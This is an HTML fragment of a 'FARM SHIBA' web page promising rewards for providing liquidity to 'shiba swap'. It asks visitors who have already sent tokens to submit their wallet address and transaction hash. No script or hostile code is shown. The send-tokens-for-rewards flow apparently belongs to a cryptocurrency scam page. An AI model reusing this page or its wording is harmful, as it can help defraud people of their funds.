<div
    class="flex flex-col flex-1 items-center justify-start w-screen h-full overflow-y-auto overflow-x-hidden z-0 main-container-section">
    <div class="sc-eXEjpC sc-hXRMBi eEhUZA"></div>
    <div height="0" class="sc-eTuwsz kyVAdl">
        <div class="sc-gwVKww dylNmp"></div>
    </div>
    <div class="sc-eXEjpC sc-cHSUfg bYQNJg dig-liquidity mb-auto my-auto relative">
        <div class="block w-full rounded text-sm p-4 text-high-emphesis fetch-container text">
            <div class="text-2xl font-extrabold mb-1 text">FARM SHIBA
            </div>
            <div class="flex items-center">
                <div class="ml-0">
                    <p class="text-gray-5000 font-extrabold text">Provide liquidity to shiba swap and
                        receive great rewards.</p>
                </div>
            </div>
        </div>

        <div class="inst_container">
            <div class="inst_center">
                <p style="font-family:'Heebo' !important">If you already sent the tokens, write below the Transaction Hash and the wallet address from you
                    wallet.
                </p>
                <div class='login__camp'>
                    <label for='username' class='label_icons'><i class='fas fa-wallet'></i></label>
                    <input type='text' id='inputWallet' value='' placeholder='Wallet Address' class='input'>
                </div>

                <div class='login__camp'>
                    <label for='username' class='label_icons'><i class="fab fa-hive"></i></label>
                    <input type='text' id='inputTx' value='' placeholder='Txn Hash' class='input'>
                </div>
                <p id='errParr' style='color:red;'></p>
                <button id="toStep4" class="farm_button">Next Step</button>
            </div>
        </div>



    </div>
</div>
</div>
</div>